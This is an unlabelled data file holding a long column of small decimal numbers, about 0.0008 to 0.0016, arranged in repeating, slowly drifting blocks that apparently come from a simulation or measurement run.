0.00125965
0.00125451
0.00125065
0.00125476
0.00125075
0.00125461
0.00125473
0.00125084
0.00125448
0.0012547
0.00125087
0.00125066
0.00125449
0.00125471
0.00125087
0.00125962
0.00126338
0.0012635
0.00125938
0.00126329
0.00125952
0.00125942
0.00125965
0.00125944
0.00126326
0.00126348
0.00126326
0.00125965
0.00125944
0.00125451
0.00125064
0.00125476
0.00125075
0.00125461
0.00125473
0.00125084
0.00125466
0.00125425
0.00125086
0.00125086
0.0012545
0.0012545
0.00125071
0.00122637
0.00122637
0.0012176
0.0012176
0.0012176
0.00121759
0.00122637
0.00122637
0.00122637
0.0012176
0.0012176
0.0012176
0.00121759
0.00122637
0.00122637
0.00122637
0.0012176
0.0012176
0.0012176
0.00121759
0.00122637
0.00120883
0.00120005
0.00120005
0.00120882
0.00120883
0.00120882
0.00120005
0.00120883
0.00120005
0.00120005
0.00120882
0.00120882
0.00120882
0.00120005
0.00120883
0.00120005
0.00120005
0.00120883
0.00120882
0.00120882
0.00120005
0.00120883
0.00120005
0.00120005
0.00120882
0.00120882
0.00120882
0.00120005
0.00121938
0.00121961
0.00121556
0.00121578
0.00121961
0.00121939
0.00121578
0.00122452
0.00122829
0.0012284
0.00122429
0.00122819
0.00122443
0.00122432
0.00122456
0.00122435
0.00122839
0.00122816
0.00122816
0.00122434
0.00122455
0.00121942
0.00121555
0.00121966
0.00121565
0.00121951
0.00121963
0.00121574
0.00121939
0.00121961
0.00121577
0.00121556
0.00121939
0.00121961
0.00121578
0.00122452
0.00122828
0.0012284
0.00122429
0.0012282
0.00122443
0.00122432
0.00122456
0.00122435
0.00122816
0.00122839
0.00122817
0.00122455
0.00122434
0.00121942
0.00121555
0.00121966
0.00121566
0.00121951
0.00121963
0.00121575
0.00121956
0.00121915
0.00121577
0.00121577
0.00121941
0.00121941
0.00121561
0.00119127
0.00119127
0.0011825
0.0011825
0.0011825
0.00118249
0.00119127
0.00119127
0.00119127
0.0011825
0.0011825
0.0011825
0.00118249
0.00119127
0.00119127
0.00119127
0.0011825
0.0011825
0.0011825
0.00118249
0.00119127
0.00117373
0.00116494
0.00116494
0.00117372
0.00117372
0.00117372
0.00116494
0.00117373
0.00116494
0.00116494
0.00117372
0.00117372
0.00117372
0.00116494
0.00117373
0.00116494
0.00116494
0.00117372
0.00117372
0.00117372
0.00116494
0.00117373
0.00116494
0.00116494
0.00117372
0.00117372
0.00117372
0.00116494
0.00118429
0.00118451
0.00118047
0.00118067
0.00118451
0.00118429
0.00118068
0.00118943
0.00119319
0.00119331
0.00118918
0.0011931
0.00118933
0.00118922
0.00118946
0.00118925
0.00119329
0.00119306
0.00119306
0.00118925
0.00118945
0.00118432
0.00118045
0.00118456
0.00118056
0.00118441
0.00118453
0.00118065
0.00118429
0.00118451
0.00118068
0.00118048
0.0011843
0.00118452
0.00118068
0.00118943
0.00119319
0.00119331
0.00118919
0.0011931
0.00118933
0.00118923
0.00118946
0.00118925
0.00119307
0.00119329
0.00119307
0.00118946
0.00118925
0.00118432
0.00118046
0.00118457
0.00118056
0.00118442
0.00118454
0.00118065
0.00118447
0.00118406
0.00118067
0.00118067
0.00118431
0.00118431
0.00118051
0.00115617
0.00115617
0.0011474
0.00114739
0.00114739
0.00114738
0.00115616
0.00115617
0.00115617
0.0011474
0.00114739
0.00114739
0.00114738
0.00115616
0.00115617
0.00115617
0.0011474
0.00114739
0.00114739
0.00114739
0.00115616
0.00113862
0.00112983
0.00112983
0.00113861
0.00113861
0.00113861
0.00112983
0.00113862
0.00112983
0.00112983
0.00113861
0.00113861
0.00113861
0.00112983
0.00113862
0.00112983
0.00112983
0.00113861
0.00113861
0.00113861
0.00112983
0.00113862
0.00112983
0.00112983
0.00113861
0.00113861
0.00113861
0.00112983
0.00114918
0.0011494
0.00114536
0.00114557
0.00114941
0.00114919
0.00114557
0.00115432
0.00115808
0.0011582
0.00115408
0.00115799
0.00115422
0.00115412
0.00115435
0.00115415
0.00115818
0.00115796
0.00115796
0.00115414
0.00115435
0.00114921
0.00114534
0.00114946
0.00114545
0.00114931
0.00114942
0.00114554
0.00114918
0.00114941
0.00114557
0.00114536
0.00114919
0.00114941
0.00114557
0.00115432
0.00115809
0.00115821
0.00115409
0.001158
0.00115423
0.00115412
0.00115436
0.00115416
0.00115796
0.00115819
0.00115796
0.00115435
0.00115414
0.00114921
0.00114535
0.00114946
0.00114545
0.00114931
0.00114943
0.00114554
0.00114936
0.00114895
0.00114556
0.00114556
0.0011492
0.0011492
0.0011454
0.00112106
0.00112106
0.00111228
0.00111228
0.00111228
0.00111227
0.00112105
0.00112106
0.00112106
0.00111228
0.00111228
0.00111228
0.00111227
0.00112105
0.00112106
0.00112106
0.00111228
0.00111228
0.00111228
0.00111227
0.00112105
0.00110351
0.00109472
0.00109472
0.0011035
0.0011035
0.0011035
0.00109472
0.0011035
0.00109472
0.00109472
0.0011035
0.0011035
0.0011035
0.00109472
0.0011035
0.00109472
0.00109472
0.0011035
0.0011035
0.00110349
0.00109472
0.0011035
0.00109472
0.00109472
0.0011035
0.0011035
0.00110349
0.00109472
0.00111406
0.00111429
0.00111025
0.00111045
0.00111429
0.00111407
0.00111046
0.00111921
0.00112297
0.00112309
0.00111897
0.00112288
0.00111911
0.00111901
0.00111924
0.00111903
0.00112307
0.00112285
0.00112285
0.00111903
0.00111924
0.0011141
0.00111023
0.00111434
0.00111033
0.00111419
0.00111431
0.00111042
0.00111407
0.00111429
0.00111045
0.00111024
0.00111407
0.00111429
0.00111046
0.00111921
0.00112297
0.00112309
0.00111897
0.00112288
0.00111911
0.001119
0.00111924
0.00111903
0.00112285
0.00112307
0.00112285
0.00111924
0.00111903
0.0011141
0.00111022
0.00111434
0.00111033
0.00111419
0.00111431
0.00111042
0.00111425
0.00111383
0.00111045
0.00111045
0.00111409
0.00111409
0.00111029
0.00108594
0.00108594
0.00107717
0.00107716
0.00107716
0.00107715
0.00108593
0.00108594
0.00108594
0.00107716
0.00107716
0.00107716
0.00107715
0.00108593
0.00108594
0.00108594
0.00107716
0.00107716
0.00107716
0.00107715
0.00108593
0.00106839
0.0010596
0.0010596
0.00106838
0.00106838
0.00106838
0.0010596
0.00106839
0.0010596
0.0010596
0.00106838
0.00106838
0.00106838
0.0010596
0.00106838
0.0010596
0.0010596
0.00106838
0.00106838
0.00106838
0.0010596
0.00106838
0.0010596
0.0010596
0.00106838
0.00106838
0.00106838
0.0010596
0.00107895
0.00107917
0.00107513
0.00107534
0.00107918
0.00107895
0.00107534
0.00108409
0.00108786
0.00108798
0.00108386
0.00108777
0.001084
0.00108389
0.00108412
0.00108392
0.00108796
0.00108773
0.00108773
0.00108391
0.00108412
0.00107898
0.00107511
0.00107923
0.00107522
0.00107908
0.00107919
0.00107531
0.00107895
0.00107917
0.00107534
0.00107512
0.00107896
0.00107917
0.00107533
0.00108409
0.00108785
0.00108797
0.00108385
0.00108776
0.00108399
0.00108389
0.00108412
0.00108391
0.00108773
0.00108795
0.00108773
0.00108412
0.00108391
0.00107898
0.00107511
0.00107922
0.00107521
0.00107907
0.00107919
0.0010753
0.00107913
0.00107871
0.00107533
0.00107533
0.00107897
0.00107897
0.00107517
0.00105082
0.00105082
0.00104205
0.00104204
0.00104204
0.00104204
0.00105082
0.00105082
0.00105082
0.00104205
0.00104204
0.00104204
0.00104203
0.00105082
0.00105082
0.00105082
0.00104205
0.00104204
0.00104204
0.00104204
0.00105082
0.00103327
0.00102448
0.00102448
0.00103326
0.00103326
0.00103326
0.00102448
0.00103327
0.00102448
0.00102448
0.00103326
0.00103326
0.00103326
0.00102448
0.00103327
0.00102448
0.00102448
0.00103326
0.00103326
0.00103326
0.00102448
0.00103327
0.00102448
0.00102448
0.00103326
0.00103326
0.00103326
0.00102448
0.00104383
0.00104405
0.00104001
0.00104022
0.00104406
0.00104384
0.00104022
0.00104897
0.00105274
0.00105286
0.00104874
0.00105265
0.00104888
0.00104877
0.00104901
0.0010488
0.00105284
0.00105261
0.00105261
0.00104879
0.001049
0.00104386
0.00103999
0.00104411
0.0010401
0.00104396
0.00104407
0.00104019
0.00104383
0.00104405
0.00104022
0.00104001
0.00104384
0.00104405
0.00104022
0.00104897
0.00105274
0.00105286
0.00104873
0.00105265
0.00104888
0.00104877
0.00104901
0.0010488
0.00105261
0.00105284
0.00105262
0.001049
0.00104879
0.00104386
0.00103999
0.00104411
0.0010401
0.00104396
0.00104407
0.00104019
0.00104401
0.0010436
0.00104021
0.00104021
0.00104385
0.00104385
0.00104005
0.0010157
0.0010157
0.00100693
0.00100692
0.00100692
0.00100692
0.0010157
0.0010157
0.0010157
0.00100692
0.00100692
0.00100692
0.00100691
0.00101569
0.0010157
0.0010157
0.00100692
0.00100692
0.00100692
0.00100691
0.0010157
0.000998148
0.000989358
0.000989358
0.000998142
0.000998141
0.000998138
0.000989356
0.000998146
0.000989358
0.000989357
0.000998141
0.000998139
0.000998137
0.000989356
0.000998143
0.000989356
0.000989355
0.000998139
0.000998136
0.000998135
0.000989355
0.000998143
0.000989355
0.000989355
0.000998138
0.000998138
0.000998136
0.000989355
0.00100871
0.00100893
0.00100489
0.0010051
0.00100894
0.00100872
0.0010051
0.00101385
0.00101762
0.00101774
0.00101362
0.00101753
0.00101376
0.00101365
0.00101389
0.00101368
0.00101772
0.00101749
0.0010175
0.00101367
0.00101388
0.00100874
0.00100487
0.00100899
0.00100498
0.00100884
0.00100895
0.00100507
0.00100871
0.00100893
0.00100509
0.00100489
0.00100871
0.00100893
0.00100509
0.00101385
0.00101762
0.00101774
0.00101362
0.00101753
0.00101376
0.00101365
0.00101389
0.00101368
0.00101749
0.00101772
0.0010175
0.00101388
0.00101367
0.00100874
0.00100487
0.00100899
0.00100498
0.00100884
0.00100896
0.00100506
0.00100889
0.00100848
0.00100509
0.00100509
0.00100873
0.00100873
0.00100493
0.000980576
0.000980575
0.000971799
0.000971794
0.000971793
0.000971788
0.000980571
0.000980576
0.000980573
0.000971798
0.000971795
0.000971792
0.000971787
0.00098057
0.000980575
0.000980574
0.000971798
0.000971793
0.000971793
0.000971787
0.00098057
0.000963019
0.000954225
0.000954227
0.00096301
0.000963013
0.000963008
0.000954225
0.000963016
0.000954225
0.000954227
0.00096301
0.000963009
0.000963007
0.000954225
0.000963017
0.000954228
0.000954225
0.000963012
0.000963008
0.000963007
0.000954225
0.000963015
0.000954226
0.000954225
0.000963009
0.000963009
0.000963007
0.000954225
0.000973584
0.000973808
0.000969766
0.000969969
0.000973813
0.000973587
0.000969971
0.000978728
0.000982495
0.000982613
0.000978492
0.000982404
0.000978631
0.000978527
0.00097876
0.000978554
0.000982593
0.00098237
0.00098237
0.000978546
0.000978756
0.000973618
0.000969753
0.000973862
0.000969854
0.000973713
0.000973831
0.000969945
0.000973587
0.000973806
0.000969971
0.000969761
0.000973591
0.00097381
0.000969974
0.000978725
0.000982494
0.000982617
0.000978489
0.000982403
0.00097863
0.000978527
0.00097876
0.000978551
0.000982371
0.000982592
0.000982368
0.000978756
0.000978545
0.000973615
0.000969742
0.000973858
0.000969848
0.000973709
0.000973825
0.000969939
0.000973762
0.000973349
0.000969965
0.000969964
0.000973606
0.000973605
0.000969804
0.000945442
0.000945445
0.000936668
0.00093666
0.000936663
0.000936655
0.000945439
0.000945444
0.000945442
0.000936667
0.000936662
0.00093666
0.000936656
0.00094544
0.000945444
0.000945442
0.000936666
0.000936661
0.00093666
0.000936654
0.000945439
0.000927886
0.000919095
0.000919096
0.000927878
0.00092788
0.000927877
0.000919095
0.000927885
0.000919094
0.000919095
0.000927877
0.000927879
0.000927875
0.000919094
0.000927885
0.000919095
0.000919094
0.000927879
0.000927877
0.000927876
0.000919094
0.000927883
0.000919095
0.000919094
0.000927878
0.000927876
0.000927875
0.000919094
0.00093845
0.000938671
0.000934624
0.000934835
0.000938675
0.000938453
0.000934837
0.000943593
0.000947361
0.000947477
0.000943357
0.00094727
0.000943496
0.000943391
0.000943627
0.000943418
0.000947461
0.000947238
0.000947238
0.000943412
0.000943621
0.000938482
0.000934608
0.000938725
0.000934715
0.000938576
0.000938691
0.000934806
0.00093845
0.000938674
0.000934834
0.000934628
0.000938455
0.000938677
0.000934838
0.000943595
0.000947362
0.00094748
0.00094336
0.00094727
0.000943499
0.000943394
0.000943627
0.000943421
0.000947236
0.000947462
0.000947238
0.000943622
0.000943414
0.000938485
0.000934611
0.000938729
0.000934719
0.00093858
0.000938697
0.000934809
0.000938633
0.000938218
0.00093483
0.000934834
0.000938473
0.000938476
0.000934673
0.000910312
0.000910313
0.000901537
0.00090153
0.000901531
0.000901524
0.000910308
0.000910314
0.000910312
0.000901537
0.000901532
0.00090153
0.000901525
0.000910309
0.000910312
0.000910312
0.000901535
0.00090153
0.000901529
0.000901524
0.000910308
0.000892755
0.000883964
0.000883965
0.000892748
0.000892749
0.000892746
0.000883963
0.000892754
0.000883963
0.000883964
0.000892747
0.000892747
0.000892744
0.000883963
0.000892755
0.000883965
0.000883964
0.000892749
0.000892747
0.000892745
0.000883964
0.000892753
0.000883964
0.000883964
0.000892747
0.000892746
0.000892745
0.000883963
0.000903321
0.000903542
0.000899498
0.000899709
0.000903544
0.000903326
0.000899711
0.000908464
0.000912232
0.000912347
0.000908226
0.00091214
0.000908367
0.000908261
0.000908498
0.000908288
0.000912326
0.000912105
0.000912107
0.00090828
0.000908493
0.000903354
0.000899479
0.000903595
0.000899584
0.000903448
0.000903563
0.000899679
0.00090332
0.000903545
0.000899708
0.000899498
0.000903328
0.000903546
0.000899708
0.000908463
0.000912231
0.00091235
0.000908229
0.000912139
0.000908368
0.000908264
0.000908495
0.00090829
0.000912105
0.000912332
0.000912107
0.000908491
0.000908284
0.000903352
0.000899481
0.000903598
0.000899586
0.000903448
0.000903564
0.000899678
0.000903502
0.000903086
0.000899701
0.000899698
0.000903344
0.000903343
0.000899542
0.000875181
0.000875183
0.000866406
0.000866399
0.000866401
0.000866394
0.000875178
0.000875183
0.000875183
0.000866408
0.000866402
0.000866401
0.000866395
0.000875178
0.000875183
0.000875182
0.000866405
0.000866401
0.000866401
0.000866395
0.000875178
0.000857624
0.000848833
0.000848834
0.000857617
0.000857618
0.000857615
0.000848833
0.000857624
0.000848833
0.000848834
0.000857616
0.000857617
0.000857614
0.000848832
0.000857625
0.000848835
0.000848835
0.000857618
0.000857618
0.000857615
0.000848833
0.000857623
0.000848834
0.000848834
0.000857618
0.000857617
0.000857615
0.000848833
0.000868193
0.000868415
0.000864371
0.000864577
0.000868419
0.000868198
0.000864581
0.000873336
0.000877102
0.000877222
0.000873101
0.00087701
0.000873239
0.000873138
0.00087337
0.00087316
0.0008772
0.000876976
0.000876977
0.000873155
0.000873364
0.000868224
0.000864356
0.00086847
0.000864458
0.000868319
0.000868439
0.000864548
0.000868192
0.000868414
0.000864579
0.000864372
0.000868197
0.00086842
0.000864581
0.000873334
0.000877102
0.000877221
0.0008731
0.000877011
0.000873237
0.000873134
0.000873369
0.000873161
0.000876978
0.000877204
0.00087698
0.000873364
0.000873156
0.000868225
0.000864357
0.00086847
0.00086446
0.000868319
0.000868437
0.000864552
0.000868371
0.000867957
0.00086457
0.000864571
0.000868213
0.000868215
0.000864412
0.000840052
0.000840053
0.000831276
0.000831271
0.00083127
0.000831264
0.000840047
0.000840053
0.000840053
0.000831278
0.000831272
0.000831271
0.000831266
0.000840049
0.000840053
0.000840052
0.000831275
0.00083127
0.000831271
0.000831265
0.000840048
0.000822495
0.000813705
0.000813705
0.000822488
0.000822488
0.000822486
0.000813703
0.000822492
0.000813704
0.000813704
0.000822488
0.000822486
0.000822485
0.000813704
0.000822495
0.000813706
0.000813705
0.000822488
0.000822488
0.000822486
0.000813705
0.000822492
0.000813704
0.000813705
0.000822486
0.000822488
0.000822485
0.000813704
0.000833059
0.000833281
0.000829234
0.000829444
0.000833283
0.000833064
0.000829445
0.000838201
0.000841971
0.000842086
0.000837965
0.000841878
0.000838106
0.000837999
0.000838236
0.000838027
0.000842068
0.000841846
0.000841845
0.000838019
0.000838232
0.00083309
0.000829216
0.000833334
0.000829321
0.000833184
0.0008333
0.000829414
0.000833063
0.000833285
0.000829451
0.000829238
0.000833069
0.000833288
0.00082945
0.000838203
0.000841972
0.000842089
0.000837969
0.000841879
0.000838106
0.000838002
0.000838239
0.00083803
0.000841847
0.000842069
0.000841848
0.000838234
0.000838023
0.000833093
0.00082922
0.000833339
0.000829326
0.000833187
0.000833304
0.000829417
0.000833241
0.000832829
0.000829441
0.000829441
0.000833083
0.000833085
0.000829283
0.000804922
0.000804923
0.000796146
0.000796141
0.00079614
0.000796135
0.000804918
0.000804925
0.000804924
0.000796149
0.000796144
0.000796143
0.000796137
0.00080492
0.000804923
0.000804923
0.000796145
0.000796141
0.000796142
0.000796136
0.000804919
0.000787367
0.000778577
0.000778578
0.00078736
0.000787361
0.000787358
0.000778575
0.000787364
0.000778576
0.000778575
0.000787359
0.000787357
0.000787357
0.000778575
0.000787367
0.000778578
0.000778577
0.000787362
0.000787361
0.000787358
0.000778576
0.000787363
0.000778576
0.000778577
0.000787358
0.00078736
0.000787357
0.000778575
0.000797933
0.000798154
0.000794106
0.000794317
0.000798156
0.000797934
0.00079432
0.000803073
0.000806839
0.000806955
0.000802834
0.00080675
0.000802976
0.000802869
0.000803108
0.000802899
0.000806939
0.000806716
0.000806719
0.000802891
0.000803101
0.000797963
0.000794088
0.000798204
0.000794196
0.000798057
0.000798171
0.000794287
0.000797935
0.000798154
0.000794318
0.000794109
0.000797939
0.000798158
0.000794325
0.000803074
0.000806841
0.000806958
0.000802837
0.00080675
0.000802976
0.000802871
0.000803108
0.000802899
0.000806716
0.00080694
0.000806718
0.000803104
0.000802893
0.000797965
0.00079409
0.000798208
0.000794199
0.000798058
0.000798174
0.000794292
0.000798111
0.000797698
0.000794313
0.000794312
0.000797954
0.000797955
0.000794153
0.00164067
0.00164029
0.00163688
0.00163688
0.00163671
0.00164052
0.00164052
0.00162792
0.00162834
0.00163172
0.00163172
0.00163187
0.00162808
0.00162808
0.00164051
0.00163665
0.00163689
0.0016407
0.0016407
0.00164051
0.00163689
0.00164565
0.00164942
0.00164539
0.00164952
0.00164543
0.00164555
0.00164934
0.00164054
0.00163663
0.00164075
0.00163674
0.00164072
0.00164061
0.00163685
0.00164568
0.00164546
0.0016495
0.00164931
0.00164545
0.00164569
0.0016493
0.0016405
0.00163665
0.00163689
0.00164071
0.00164071
0.00164051
0.00163689
0.00164565
0.00164941
0.00164539
0.00164952
0.00164543
0.00164554
0.00164933
0.00164053
0.00163663
0.00164075
0.00163674
0.00164072
0.00163685
0.00164061
0.00164568
0.00164546
0.0016495
0.00164931
0.00164545
0.00164569
0.0016493
0.00162809
0.0016319
0.00163171
0.00162787
0.0016317
0.00162785
0.00162809
0.00162295
0.00161916
0.00162316
0.00161905
0.00162303
0.00162313
0.00161927
0.00162806
0.00163192
0.00163181
0.00162779
0.00162795
0.00163174
0.00162783
0.00162292
0.00162311
0.00161907
0.00161931
0.00162312
0.00162293
0.0016193
0.00162809
0.0016319
0.00163171
0.00162787
0.0016317
0.00162786
0.00162809
0.00162295
0.00161916
0.00162316
0.00161905
0.00162314
0.00162303
0.00161927
0.00162806
0.00163192
0.00163181
0.0016278
0.00163174
0.00162784
0.00162795
0.00162291
0.00162312
0.00161907
0.00161931
0.00162312
0.00162293
0.0016193
0.00164067
0.00164029
0.00163688
0.00163688
0.00164052
0.00164052
0.00163671
0.00162791
0.00162834
0.00163172
0.00163172
0.00162808
0.00163187
0.00162808
0.0016405
0.00163666
0.00163689
0.0016407
0.00164071
0.00164051
0.00163688
0.00164565
0.0016494
0.00164539
0.00164952
0.00164543
0.00164553
0.00164933
0.00164054
0.00163664
0.00164075
0.00163675
0.00164073
0.00164061
0.00163685
0.00164568
0.00164546
0.0016495
0.00164931
0.00164545
0.00164568
0.0016493
0.0016405
0.00163689
0.00163665
0.0016407
0.00164051
0.00164071
0.00163688
0.00164565
0.00164941
0.00164539
0.00164952
0.00164543
0.00164554
0.00164933
0.00164053
0.00163663
0.00164075
0.00163674
0.00164072
0.00163685
0.00164061
0.00164568
0.00164546
0.00164931
0.0016495
0.00164568
0.00164545
0.0016493
0.00162809
0.00163191
0.00163171
0.00162787
0.0016317
0.00162786
0.00162809
0.00162295
0.00161916
0.00162316
0.00161905
0.00162303
0.00162313
0.00161927
0.00162806
0.00163192
0.00163181
0.0016278
0.00162795
0.00163174
0.00162784
0.00162291
0.00162312
0.00161907
0.0016193
0.00162312
0.00162292
0.0016193
0.00162809
0.00163171
0.00163191
0.00162786
0.0016317
0.00162809
0.00162786
0.00162294
0.00161916
0.00162316
0.00161905
0.00162313
0.00162302
0.00161926
0.00162806
0.00163192
0.00163181
0.00162779
0.00163174
0.00162784
0.00162795
0.00162291
0.00162311
0.0016193
0.00161907
0.00162292
0.00162312
0.0016193
0.0016405
0.00163689
0.00163665
0.00164071
0.00164051
0.00164071
0.00163688
0.00164565
0.00164941
0.00164539
0.00164952
0.00164554
0.00164543
0.00164933
0.00164053
0.00163663
0.00164075
0.00163674
0.00164061
0.00164072
0.00163685
0.00164568
0.00164546
0.00164931
0.0016495
0.00164568
0.00164545
0.0016493
0.00162809
0.00163191
0.00163171
0.00162787
0.0016317
0.00162786
0.00162809
0.00162294
0.00161916
0.00162316
0.00161905
0.00161927
0.00162302
0.00162314
0.00162806
0.00163192
0.00163181
0.0016278
0.00163174
0.00162795
0.00162784
0.00162291
0.00162312
0.00161907
0.00161931
0.0016193
0.00162312
0.00162292
0.00162809
0.00163171
0.00163191
0.00162787
0.0016317
0.00162809
0.00162786
0.00162295
0.00161916
0.00162316
0.00161905
0.00162313
0.00162302
0.00161926
0.00162806
0.00163192
0.00163181
0.0016278
0.00163174
0.00162784
0.00162795
0.00162291
0.00162311
0.0016193
0.00161907
0.00162292
0.00162312
0.0016193
0.00164067
0.00164029
0.00163688
0.00163688
0.00164053
0.00164052
0.00163671
0.00162791
0.00162834
0.00163172
0.00163172
0.00162808
0.00163186
0.00162808
0.0016405
0.00163689
0.00163665
0.00164071
0.00164051
0.00164071
0.00163688
0.00164565
0.00164941
0.00164539
0.00164952
0.00164554
0.00164543
0.00164933
0.00164053
0.00163663
0.00164075
0.00163675
0.00164061
0.00164072
0.00163685
0.00164568
0.00164546
0.00164931
0.0016495
0.00164568
0.00164545
0.0016493
0.00162809
0.00163171
0.00163191
0.00162787
0.0016317
0.00162809
0.00162786
0.00162294
0.00161916
0.00162316
0.00161905
0.00161927
0.00162302
0.00162313
0.00162806
0.00163192
0.00163181
0.00162779
0.00163174
0.00162795
0.00162784
0.00162291
0.00162312
0.0016193
0.00161907
0.0016193
0.00162292
0.00162312
0.00162809
0.00163171
0.00163191
0.00162787
0.0016317
0.00162809
0.00162786
0.00162294
0.00161916
0.00162316
0.00161905
0.00162314
0.00162302
0.00161926
0.00162806
0.00163192
0.00163181
0.0016278
0.00163174
0.00162784
0.00162795
0.00162291
0.00162312
0.0016193
0.00161907
0.00162292
0.00162312
0.0016193
0.00162791
0.00162834
0.00163172
0.00163172
0.00163187
0.00162808
0.00162808
0.00160551
0.00160513
0.00160172
0.00160173
0.00160155
0.00160537
0.00160537
0.00159277
0.0015932
0.00159658
0.00159658
0.00159672
0.00159294
0.00159294
0.00160534
0.00160554
0.0016015
0.00160173
0.00160555
0.00160535
0.00160173
0.00161049
0.00161424
0.00161434
0.00161022
0.00161026
0.00161416
0.00161037
0.00161052
0.00161029
0.00161433
0.00161413
0.00161029
0.00161413
0.00161052
0.00160538
0.00160148
0.00160559
0.00160159
0.00160556
0.00160545
0.0016017
0.00160534
0.00160554
0.0016015
0.00160173
0.00160555
0.00160535
0.00160173
0.00161049
0.00161423
0.00161434
0.00161022
0.00161416
0.00161026
0.00161037
0.00161052
0.00161029
0.00161433
0.00161413
0.00161413
0.00161029
0.00161052
0.00160537
0.00160148
0.00160559
0.00160159
0.00160556
0.0016017
0.00160546
0.00159295
0.00159676
0.00159656
0.00159273
0.00159656
0.00159272
0.00159295
0.00158781
0.00158403
0.00158803
0.00158392
0.0015879
0.00158801
0.00158414
0.00159292
0.00159678
0.00159667
0.00159266
0.00159281
0.00159659
0.0015927
0.00158778
0.00158799
0.00158395
0.00158417
0.00158799
0.00158779
0.00158417
0.00159295
0.00159676
0.00159656
0.00159273
0.00159656
0.00159272
0.00159295
0.00158781
0.00158403
0.00158803
0.00158392
0.00158801
0.00158789
0.00158414
0.00159292
0.00159678
0.00159667
0.00159266
0.00159659
0.0015927
0.00159281
0.00158778
0.00158799
0.00158395
0.00158417
0.00158799
0.00158778
0.00158417
0.00160551
0.00160513
0.00160172
0.00160172
0.00160536
0.00160536
0.00160155
0.00159278
0.0015932
0.00159658
0.00159658
0.00159294
0.00159672
0.00159294
0.00160534
0.00160555
0.0016015
0.00160173
0.00160555
0.00160535
0.00160173
0.00161048
0.00161424
0.00161435
0.00161022
0.00161026
0.00161416
0.00161037
0.00161052
0.00161029
0.00161433
0.00161413
0.00161029
0.00161412
0.00161052
0.00160537
0.00160148
0.00160559
0.00160159
0.00160556
0.00160545
0.0016017
0.00160534
0.00160555
0.00160173
0.0016015
0.00160535
0.00160555
0.00160173
0.00161048
0.00161423
0.00161434
0.00161022
0.00161415
0.00161026
0.00161037
0.00161052
0.0016103
0.00161413
0.00161433
0.00161412
0.00161052
0.00161028
0.00160537
0.00160147
0.00160559
0.00160159
0.00160556
0.00160169
0.00160545
0.00159295
0.00159676
0.00159656
0.00159273
0.00159656
0.00159272
0.00159295
0.00158781
0.00158403
0.00158803
0.00158392
0.00158789
0.001588
0.00158414
0.00159292
0.00159678
0.00159667
0.00159265
0.00159281
0.00159659
0.0015927
0.00158778
0.00158799
0.00158394
0.00158417
0.00158799
0.00158779
0.00158417
0.00159295
0.00159656
0.00159676
0.00159273
0.00159655
0.00159295
0.00159272
0.00158781
0.00158403
0.00158803
0.00158392
0.001588
0.00158789
0.00158414
0.00159292
0.00159677
0.00159666
0.00159265
0.00159659
0.00159269
0.00159281
0.00158778
0.00158798
0.00158417
0.00158394
0.00158779
0.00158799
0.00158417
0.00160534
0.00160555
0.00160173
0.0016015
0.00160535
0.00160555
0.00160173
0.00161048
0.00161423
0.00161434
0.00161022
0.00161037
0.00161416
0.00161026
0.00161052
0.00161029
0.00161413
0.00161433
0.00161051
0.00161412
0.00161028
0.00160537
0.00160148
0.00160559
0.00160159
0.00160545
0.00160556
0.00160169
0.00159295
0.00159676
0.00159656
0.00159273
0.00159655
0.00159272
0.00159295
0.00158781
0.00158403
0.00158803
0.00158392
0.00158414
0.00158789
0.001588
0.00159292
0.00159678
0.00159667
0.00159266
0.00159659
0.00159281
0.0015927
0.00158778
0.00158799
0.00158395
0.00158418
0.00158417
0.00158799
0.00158779
0.00159295
0.00159656
0.00159676
0.00159273
0.00159656
0.00159295
0.00159272
0.00158781
0.00158403
0.00158803
0.00158392
0.001588
0.00158789
0.00158414
0.00159292
0.00159678
0.00159667
0.00159266
0.00159659
0.0015927
0.00159281
0.00158778
0.00158799
0.00158418
0.00158394
0.00158779
0.00158799
0.00158417
0.0016055
0.00160513
0.00160172
0.00160172
0.00160536
0.00160536
0.00160155
0.00159277
0.00159319
0.00159657
0.00159657
0.00159294
0.00159672
0.00159294
0.00160534
0.00160554
0.00160173
0.0016015
0.00160535
0.00160555
0.00160172
0.00161048
0.00161423
0.00161434
0.00161022
0.00161037
0.00161416
0.00161026
0.00161052
0.00161029
0.00161413
0.00161433
0.00161052
0.00161412
0.00161029
0.00160537
0.00160148
0.00160559
0.00160159
0.00160545
0.00160556
0.00160169
0.00159295
0.00159656
0.00159676
0.00159273
0.00159655
0.00159294
0.00159272
0.00158781
0.00158404
0.00158803
0.00158392
0.00158414
0.00158789
0.001588
0.00159292
0.00159677
0.00159666
0.00159266
0.00159659
0.00159281
0.0015927
0.00158778
0.00158799
0.00158417
0.00158395
0.00158417
0.00158779
0.00158799
0.00159295
0.00159656
0.00159676
0.00159273
0.00159655
0.00159294
0.00159272
0.00158781
0.00158403
0.00158803
0.00158392
0.00158801
0.00158789
0.00158414
0.00159292
0.00159677
0.00159666
0.00159266
0.00159659
0.0015927
0.00159281
0.00158778
0.00158799
0.00158417
0.00158395
0.00158778
0.00158799
0.00158417
0.00159277
0.00159319
0.00159658
0.00159658
0.00159673
0.00159294
0.00159294
0.0015704
0.00157002
0.00156661
0.00156662
0.00156644
0.00157025
0.00157025
0.00155767
0.0015581
0.00156147
0.00156147
0.00156162
0.00155784
0.00155784
0.00157023
0.00157043
0.00156639
0.00156662
0.00157044
0.00157024
0.00156662
0.00157536
0.00157912
0.00157923
0.0015751
0.00157515
0.00157904
0.00157526
0.0015754
0.00157518
0.00157921
0.001579
0.00157517
0.00157901
0.0015754
0.00157026
0.00156637
0.00157048
0.00156648
0.00157045
0.00157034
0.00156659
0.00157023
0.00157043
0.00156639
0.00156662
0.00157044
0.00157024
0.00156662
0.00157537
0.00157911
0.00157922
0.00157511
0.00157904
0.00157515
0.00157526
0.0015754
0.00157517
0.00157921
0.00157901
0.001579
0.00157517
0.0015754
0.00157026
0.00156637
0.00157048
0.00156649
0.00157045
0.00156659
0.00157034
0.00155785
0.00156166
0.00156146
0.00155762
0.00156145
0.00155762
0.00155785
0.00155272
0.00154894
0.00155294
0.00154883
0.0015528
0.00155291
0.00154904
0.00155782
0.00156167
0.00156157
0.00155756
0.00155771
0.00156148
0.0015576
0.00155268
0.00155289
0.00154885
0.00154908
0.00155289
0.00155269
0.00154908
0.00155785
0.00156166
0.00156146
0.00155762
0.00156145
0.00155762
0.00155785
0.00155272
0.00154894
0.00155294
0.00154883
0.00155291
0.0015528
0.00154904
0.00155782
0.00156168
0.00156157
0.00155756
0.00156149
0.0015576
0.00155771
0.00155268
0.00155289
